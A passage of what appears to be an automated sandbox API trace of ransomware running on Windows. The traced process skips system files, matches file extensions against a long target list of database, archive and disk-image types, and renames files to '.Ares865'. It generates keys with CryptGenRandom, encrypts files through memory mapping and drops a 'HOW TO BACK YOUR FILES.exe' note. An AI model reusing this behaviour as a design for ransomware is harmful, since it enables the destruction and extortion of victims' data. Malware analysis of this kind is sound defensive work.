ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c5c3640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cache", cAlternateFileName="")) returned 1 [0085.473] lstrcmpiW (lpString1="Cache", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.473] lstrcmpiW (lpString1="Cache", lpString2="aoldtz.exe") returned 1 [0085.473] lstrcmpiW (lpString1="Cache", lpString2=".") returned 1 [0085.473] lstrcmpiW (lpString1="Cache", lpString2="..") returned 1 [0085.473] lstrcmpiW (lpString1="Cache", lpString2="windows") returned -1 [0085.473] lstrcmpiW (lpString1="Cache", lpString2="bootmgr") returned 1 [0085.473] lstrcmpiW (lpString1="Cache", lpString2="temp") returned -1 [0085.473] lstrcmpiW (lpString1="Cache", lpString2="pagefile.sys") returned -1 [0085.473] lstrcmpiW (lpString1="Cache", lpString2="boot") returned 1 [0085.473] lstrcmpiW (lpString1="Cache", lpString2="ids.txt") returned -1 [0085.473] lstrcmpiW (lpString1="Cache", lpString2="ntuser.dat") returned -1 [0085.473] lstrcmpiW (lpString1="Cache", lpString2="perflogs") returned -1 [0085.473] lstrcmpiW (lpString1="Cache", lpString2="MSBuild") returned -1 [0085.473] lstrlenW (lpString="Cache") returned 5 [0085.473] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*") returned 63 [0085.474] lstrcpyW (in: lpString1=0x2cce47c, lpString2="Cache" | out: lpString1="Cache") returned="Cache" [0085.474] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a28 [0085.474] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x88) returned 0x2e95b0 [0085.474] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a30 | out: ListHead=0x2e7710, ListEntry=0x2e7a30) returned 0x2e7a10 [0085.474] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c59d4e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c59d4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0085.474] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0085.474] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c015050, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0x63c5e40, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x469bd5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tokens.dat", cAlternateFileName="")) returned 1 [0085.474] lstrcmpiW (lpString1="tokens.dat", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.474] lstrcmpiW (lpString1="tokens.dat", lpString2="aoldtz.exe") returned 1 [0085.474] lstrcmpiW (lpString1="tokens.dat", lpString2=".") returned 1 [0085.474] lstrcmpiW (lpString1="tokens.dat", lpString2="..") returned 1 [0085.474] lstrcmpiW (lpString1="tokens.dat", lpString2="windows") returned -1 [0085.474] lstrcmpiW (lpString1="tokens.dat", lpString2="bootmgr") returned 1 [0085.474] lstrcmpiW (lpString1="tokens.dat", lpString2="temp") returned 1 [0085.474] lstrcmpiW (lpString1="tokens.dat", lpString2="pagefile.sys") returned 1 [0085.474] lstrcmpiW (lpString1="tokens.dat", lpString2="boot") returned 1 [0085.474] lstrcmpiW (lpString1="tokens.dat", lpString2="ids.txt") returned 1 [0085.474] lstrcmpiW (lpString1="tokens.dat", lpString2="ntuser.dat") returned 1 [0085.474] lstrcmpiW (lpString1="tokens.dat", lpString2="perflogs") returned 1 [0085.474] lstrcmpiW (lpString1="tokens.dat", lpString2="MSBuild") returned 1 [0085.474] lstrlenW (lpString="tokens.dat") returned 10 [0085.474] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache") returned 67 [0085.474] lstrcpyW (in: lpString1=0x2cce47c, lpString2="tokens.dat" | out: lpString1="tokens.dat") returned="tokens.dat" [0085.474] lstrlenW (lpString="tokens.dat") returned 10 [0085.474] lstrlenW (lpString="Ares865") returned 7 [0085.474] lstrcmpiW (lpString1="ens.dat", lpString2="Ares865") returned 1 [0085.474] lstrlenW (lpString=".dll") returned 4 [0085.474] lstrcmpiW (lpString1="tokens.dat", lpString2=".dll") returned 1 [0085.474] lstrlenW (lpString=".lnk") returned 4 [0085.474] lstrcmpiW (lpString1="tokens.dat", lpString2=".lnk") returned 1 [0085.474] lstrlenW (lpString=".ini") returned 4 [0085.474] lstrcmpiW (lpString1="tokens.dat", lpString2=".ini") returned 1 [0085.474] lstrlenW (lpString=".sys") returned 4 [0085.474] lstrcmpiW (lpString1="tokens.dat", lpString2=".sys") returned 1 [0085.474] lstrlenW (lpString="tokens.dat") returned 10 [0085.474] lstrlenW (lpString="bak") returned 3 [0085.475] lstrcmpiW (lpString1="dat", lpString2="bak") returned 1 [0085.475] lstrlenW (lpString="ba_") returned 3 [0085.475] lstrcmpiW (lpString1="dat", lpString2="ba_") returned 1 [0085.475] lstrlenW (lpString="dbb") returned 3 [0085.475] lstrcmpiW (lpString1="dat", lpString2="dbb") returned -1 [0085.475] lstrlenW (lpString="vmdk") returned 4 [0085.475] lstrcmpiW (lpString1=".dat", lpString2="vmdk") returned -1 [0085.475] lstrlenW (lpString="rar") returned 3 [0085.475] lstrcmpiW (lpString1="dat", lpString2="rar") returned -1 [0085.475] lstrlenW (lpString="zip") returned 3 [0085.475] lstrcmpiW (lpString1="dat", lpString2="zip") returned -1 [0085.475] lstrlenW (lpString="tgz") returned 3 [0085.475] lstrcmpiW (lpString1="dat", lpString2="tgz") returned -1 [0085.475] lstrlenW (lpString="vbox") returned 4 [0085.475] lstrcmpiW (lpString1=".dat", lpString2="vbox") returned -1 [0085.475] lstrlenW (lpString="vdi") returned 3 [0085.475] lstrcmpiW (lpString1="dat", lpString2="vdi") returned -1 [0085.475] lstrlenW (lpString="vhd") returned 3 [0085.475] lstrcmpiW (lpString1="dat", lpString2="vhd") returned -1 [0085.475] lstrlenW (lpString="vhdx") returned 4 [0085.475] lstrcmpiW (lpString1=".dat", lpString2="vhdx") returned -1 [0085.475] lstrlenW (lpString="avhd") returned 4 [0085.475] lstrcmpiW (lpString1=".dat", lpString2="avhd") returned -1 [0085.475] lstrlenW (lpString="db") returned 2 [0085.475] lstrcmpiW (lpString1="at", lpString2="db") returned -1 [0085.475] lstrlenW (lpString="db2") returned 3 [0085.475] lstrcmpiW (lpString1="dat", lpString2="db2") returned -1 [0085.475] lstrlenW (lpString="db3") returned 3 [0085.475] lstrcmpiW (lpString1="dat", lpString2="db3") returned -1 [0085.475] lstrlenW (lpString="dbf") returned 3 [0085.475] lstrcmpiW (lpString1="dat", lpString2="dbf") returned -1 [0085.475] lstrlenW (lpString="mdf") returned 3 [0085.475] lstrcmpiW (lpString1="dat", lpString2="mdf") returned -1 [0085.475] lstrlenW (lpString="mdb") returned 3 [0085.475] lstrcmpiW (lpString1="dat", lpString2="mdb") returned -1 [0085.475] lstrlenW (lpString="sql") returned 3 [0085.475] lstrcmpiW (lpString1="dat", lpString2="sql") returned -1 [0085.475] lstrlenW (lpString="sqlite") returned 6 [0085.476] lstrcmpiW (lpString1="ns.dat", lpString2="sqlite") returned -1 [0085.476] lstrlenW (lpString="sqlite3") returned 7 [0085.476] lstrcmpiW (lpString1="ens.dat", lpString2="sqlite3") returned -1 [0085.476] lstrlenW (lpString="sqlitedb") returned 8 [0085.476] lstrcmpiW (lpString1="kens.dat", lpString2="sqlitedb") returned -1 [0085.476] lstrlenW (lpString="xml") returned 3 [0085.476] lstrcmpiW (lpString1="dat", lpString2="xml") returned -1 [0085.476] lstrlenW (lpString="$er") returned 3 [0085.476] lstrcmpiW (lpString1="dat", lpString2="$er") returned 1 [0085.476] lstrlenW (lpString="4dd") returned 3 [0085.476] lstrcmpiW (lpString1="dat", lpString2="4dd") returned 1 [0085.476] lstrlenW (lpString="4dl") returned 3 [0085.476] lstrcmpiW (lpString1="dat", lpString2="4dl") returned 1 [0085.476] lstrlenW (lpString="^^^") returned 3 [0085.476] lstrcmpiW (lpString1="dat", lpString2="^^^") returned 1 [0085.476] lstrlenW (lpString="abs") returned 3 [0085.476] lstrcmpiW (lpString1="dat", lpString2="abs") returned 1 [0085.476] lstrlenW (lpString="abx") returned 3 [0085.476] lstrcmpiW (lpString1="dat", lpString2="abx") returned 1 [0085.476] lstrlenW (lpString="accdb") returned 5 [0085.476] lstrcmpiW (lpString1="s.dat", lpString2="accdb") returned 1 [0085.476] lstrlenW (lpString="accdc") returned 5 [0085.476] lstrcmpiW (lpString1="s.dat", lpString2="accdc") returned 1 [0085.476] lstrlenW (lpString="accde") returned 5 [0085.476] lstrcmpiW (lpString1="s.dat", lpString2="accde") returned 1 [0085.476] lstrlenW (lpString="accdr") returned 5 [0085.476] lstrcmpiW (lpString1="s.dat", lpString2="accdr") returned 1 [0085.476] lstrlenW (lpString="accdt") returned 5 [0085.476] lstrcmpiW (lpString1="s.dat", lpString2="accdt") returned 1 [0085.476] lstrlenW (lpString="accdw") returned 5 [0085.476] lstrcmpiW (lpString1="s.dat", lpString2="accdw") returned 1 [0085.476] lstrlenW (lpString="accft") returned 5 [0085.476] lstrcmpiW (lpString1="s.dat", lpString2="accft") returned 1 [0085.476] lstrlenW (lpString="adb") returned 3 [0085.476] lstrcmpiW (lpString1="dat", lpString2="adb") returned 1 [0085.476] lstrlenW (lpString="adb") returned 3 [0085.476] lstrcmpiW (lpString1="dat", lpString2="adb") returned 1 [0085.476] lstrlenW (lpString="ade") returned 3 [0085.477] lstrcmpiW (lpString1="dat", lpString2="ade") returned 1 [0085.477] lstrlenW (lpString="adf") returned 3 [0085.477] lstrcmpiW (lpString1="dat", lpString2="adf") returned 1 [0085.477] lstrlenW (lpString="adn") returned 3 [0085.477] lstrcmpiW (lpString1="dat", lpString2="adn") returned 1 [0085.477] lstrlenW (lpString="adp") returned 3 [0085.477] lstrcmpiW (lpString1="dat", lpString2="adp") returned 1 [0085.477] lstrlenW (lpString="alf") returned 3 [0085.477] lstrcmpiW (lpString1="dat", lpString2="alf") returned 1 [0085.477] lstrlenW (lpString="ask") returned 3 [0085.477] lstrcmpiW (lpString1="dat", lpString2="ask") returned 1 [0085.477] lstrlenW (lpString="btr") returned 3 [0085.477] lstrcmpiW (lpString1="dat", lpString2="btr") returned 1 [0085.477] lstrlenW (lpString="cat") returned 3 [0085.477] lstrcmpiW (lpString1="dat", lpString2="cat") returned 1 [0085.477] lstrlenW (lpString="cdb") returned 3 [0085.477] lstrcmpiW (lpString1="dat", lpString2="cdb") returned 1 [0085.477] lstrlenW (lpString="ckp") returned 3 [0085.477] lstrcmpiW (lpString1="dat", lpString2="ckp") returned 1 [0085.477] lstrlenW (lpString="cma") returned 3 [0085.477] lstrcmpiW (lpString1="dat", lpString2="cma") returned 1 [0085.477] lstrlenW (lpString="cpd") returned 3 [0085.477] lstrcmpiW (lpString1="dat", lpString2="cpd") returned 1 [0085.477] lstrlenW (lpString="dacpac") returned 6 [0085.477] lstrcmpiW (lpString1="ns.dat", lpString2="dacpac") returned 1 [0085.477] lstrlenW (lpString="dad") returned 3 [0085.477] lstrcmpiW (lpString1="dat", lpString2="dad") returned 1 [0085.477] lstrlenW (lpString="dadiagrams") returned 10 [0085.477] lstrlenW (lpString="daschema") returned 8 [0085.477] lstrcmpiW (lpString1="kens.dat", lpString2="daschema") returned 1 [0085.477] lstrlenW (lpString="db-journal") returned 10 [0085.477] lstrlenW (lpString="db-shm") returned 6 [0085.477] lstrcmpiW (lpString1="ns.dat", lpString2="db-shm") returned 1 [0085.477] lstrlenW (lpString="db-wal") returned 6 [0085.477] lstrcmpiW (lpString1="ns.dat", lpString2="db-wal") returned 1 [0085.477] lstrlenW (lpString="dbc") returned 3 [0085.477] lstrcmpiW (lpString1="dat", lpString2="dbc") returned -1 [0085.477] lstrlenW (lpString="dbs") returned 3 [0085.478] lstrcmpiW (lpString1="dat", lpString2="dbs") returned -1 [0085.478] lstrlenW (lpString="dbt") returned 3 [0085.478] lstrcmpiW (lpString1="dat", lpString2="dbt") returned -1 [0085.478] lstrlenW (lpString="dbv") returned 3 [0085.478] lstrcmpiW (lpString1="dat", lpString2="dbv") returned -1 [0085.478] lstrlenW (lpString="dbx") returned 3 [0085.478] lstrcmpiW (lpString1="dat", lpString2="dbx") returned -1 [0085.478] lstrlenW (lpString="dcb") returned 3 [0085.478] lstrcmpiW (lpString1="dat", lpString2="dcb") returned -1 [0085.478] lstrlenW (lpString="dct") returned 3 [0085.478] lstrcmpiW (lpString1="dat", lpString2="dct") returned -1 [0085.478] lstrlenW (lpString="dcx") returned 3 [0085.478] lstrcmpiW (lpString1="dat", lpString2="dcx") returned -1 [0085.478] lstrlenW (lpString="ddl") returned 3 [0085.484] lstrcmpiW (lpString1="dat", lpString2="ddl") returned -1 [0085.484] lstrlenW (lpString="dlis") returned 4 [0085.484] lstrcmpiW (lpString1=".dat", lpString2="dlis") returned -1 [0085.484] lstrlenW (lpString="dp1") returned 3 [0085.484] lstrcmpiW (lpString1="dat", lpString2="dp1") returned -1 [0085.484] lstrlenW (lpString="dqy") returned 3 [0085.484] lstrcmpiW (lpString1="dat", lpString2="dqy") returned -1 [0085.484] lstrlenW (lpString="dsk") returned 3 [0085.484] lstrcmpiW (lpString1="dat", lpString2="dsk") returned -1 [0085.484] lstrlenW (lpString="dsn") returned 3 [0085.484] lstrcmpiW (lpString1="dat", lpString2="dsn") returned -1 [0085.484] lstrlenW (lpString="dtsx") returned 4 [0085.484] lstrcmpiW (lpString1=".dat", lpString2="dtsx") returned -1 [0085.484] lstrlenW (lpString="dxl") returned 3 [0085.484] lstrcmpiW (lpString1="dat", lpString2="dxl") returned -1 [0085.484] lstrlenW (lpString="eco") returned 3 [0085.484] lstrcmpiW (lpString1="dat", lpString2="eco") returned -1 [0085.484] lstrlenW (lpString="ecx") returned 3 [0085.484] lstrcmpiW (lpString1="dat", lpString2="ecx") returned -1 [0085.484] lstrlenW (lpString="edb") returned 3 [0085.484] lstrcmpiW (lpString1="dat", lpString2="edb") returned -1 [0085.484] lstrlenW (lpString="epim") returned 4 [0085.484] lstrcmpiW (lpString1=".dat", lpString2="epim") returned -1 [0085.484] lstrlenW (lpString="fcd") returned 3 [0085.484] lstrcmpiW (lpString1="dat", lpString2="fcd") returned -1 [0085.484] lstrlenW (lpString="fdb") returned 3 [0085.484] lstrcmpiW (lpString1="dat", lpString2="fdb") returned -1 [0085.484] lstrlenW (lpString="fic") returned 3 [0085.484] lstrcmpiW (lpString1="dat", lpString2="fic") returned -1 [0085.484] lstrlenW (lpString="flexolibrary") returned 12 [0085.484] lstrlenW (lpString="fm5") returned 3 [0085.484] lstrcmpiW (lpString1="dat", lpString2="fm5") returned -1 [0085.484] lstrlenW (lpString="fmp") returned 3 [0085.484] lstrcmpiW (lpString1="dat", lpString2="fmp") returned -1 [0085.484] lstrlenW (lpString="fmp12") returned 5 [0085.485] lstrcmpiW (lpString1="s.dat", lpString2="fmp12") returned 1 [0085.485] lstrlenW (lpString="fmpsl") returned 5 [0085.485] lstrcmpiW (lpString1="s.dat", lpString2="fmpsl") returned 1 [0085.485] lstrcmpiW (lpString1="dat", lpString2="fol") returned -1 [0085.485] lstrcmpiW (lpString1="dat", lpString2="fp3") returned -1 [0085.485] lstrcmpiW (lpString1="dat", lpString2="fp4") returned -1 [0085.485] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.Ares865") returned 80 [0085.485] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.Ares865" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\tokens.dat.ares865"), dwFlags=0x1) returned 1 [0085.488] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.Ares865" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\tokens.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.488] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4627413) returned 1 [0085.489] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.489] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.489] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0085.489] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0085.490] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.490] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0085.491] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x469ee0, lpName=0x0) returned 0x15c [0085.492] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x400000, dwNumberOfBytesToMap=0x69ee0) returned 0x420000 [0085.515] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x3030000 [0085.629] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0085.629] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.629] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0085.629] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.629] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.630] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.630] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.630] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.630] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.630] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0085.630] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.630] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0085.630] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.630] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0085.634] CloseHandle (hObject=0x15c) returned 1 [0085.634] CloseHandle (hObject=0x118) returned 1 [0085.634] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.634] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0085.634] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.643] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c015050, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0x63c5e40, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x469bd5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tokens.dat", cAlternateFileName="")) returned 0 [0085.643] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0085.643] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a30 [0085.643] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache") returned="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache" [0085.643] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0085.643] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a28 | out: hHeap=0x2b0000) returned 1 [0085.643] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache") returned 67 [0085.643] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache" | out: lpString1="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache") returned="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache" [0085.643] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0085.643] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0085.644] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0085.645] GetLastError () returned 0x0 [0085.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0085.645] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0085.645] CloseHandle (hObject=0x120) returned 1 [0085.645] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0085.646] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0085.646] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8ab1ae70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x4c5c3640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c5c3640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0085.646] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.646] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0085.646] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0085.646] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8ab1ae70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x4c5c3640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c5c3640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.646] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.646] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0085.646] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0085.646] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0085.646] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9de525d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2caa5f40, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40270, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cache.dat", cAlternateFileName="")) returned 1 [0085.646] lstrcmpiW (lpString1="cache.dat", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.646] lstrcmpiW (lpString1="cache.dat", lpString2="aoldtz.exe") returned 1 [0085.646] lstrcmpiW (lpString1="cache.dat", lpString2=".") returned 1 [0085.646] lstrcmpiW (lpString1="cache.dat", lpString2="..") returned 1 [0085.646] lstrcmpiW (lpString1="cache.dat", lpString2="windows") returned -1 [0085.646] lstrcmpiW (lpString1="cache.dat", lpString2="bootmgr") returned 1 [0085.646] lstrcmpiW (lpString1="cache.dat", lpString2="temp") returned -1 [0085.646] lstrcmpiW (lpString1="cache.dat", lpString2="pagefile.sys") returned -1 [0085.646] lstrcmpiW (lpString1="cache.dat", lpString2="boot") returned 1 [0085.646] lstrcmpiW (lpString1="cache.dat", lpString2="ids.txt") returned -1 [0085.646] lstrcmpiW (lpString1="cache.dat", lpString2="ntuser.dat") returned -1 [0085.646] lstrcmpiW (lpString1="cache.dat", lpString2="perflogs") returned -1 [0085.646] lstrcmpiW (lpString1="cache.dat", lpString2="MSBuild") returned -1 [0085.646] lstrlenW (lpString="cache.dat") returned 9 [0085.646] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*") returned 69 [0085.646] lstrcpyW (in: lpString1=0x2cce488, lpString2="cache.dat" | out: lpString1="cache.dat") returned="cache.dat" [0085.646] lstrlenW (lpString="cache.dat") returned 9 [0085.646] lstrlenW (lpString="Ares865") returned 7 [0085.646] lstrcmpiW (lpString1="che.dat", lpString2="Ares865") returned 1 [0085.647] lstrlenW (lpString=".dll") returned 4 [0085.647] lstrcmpiW (lpString1="cache.dat", lpString2=".dll") returned 1 [0085.647] lstrlenW (lpString=".lnk") returned 4 [0085.647] lstrcmpiW (lpString1="cache.dat", lpString2=".lnk") returned 1 [0085.647] lstrlenW (lpString=".ini") returned 4 [0085.647] lstrcmpiW (lpString1="cache.dat", lpString2=".ini") returned 1 [0085.647] lstrlenW (lpString=".sys") returned 4 [0085.647] lstrcmpiW (lpString1="cache.dat", lpString2=".sys") returned 1 [0085.647] lstrlenW (lpString="cache.dat") returned 9 [0085.647] lstrlenW (lpString="bak") returned 3 [0085.647] lstrcmpiW 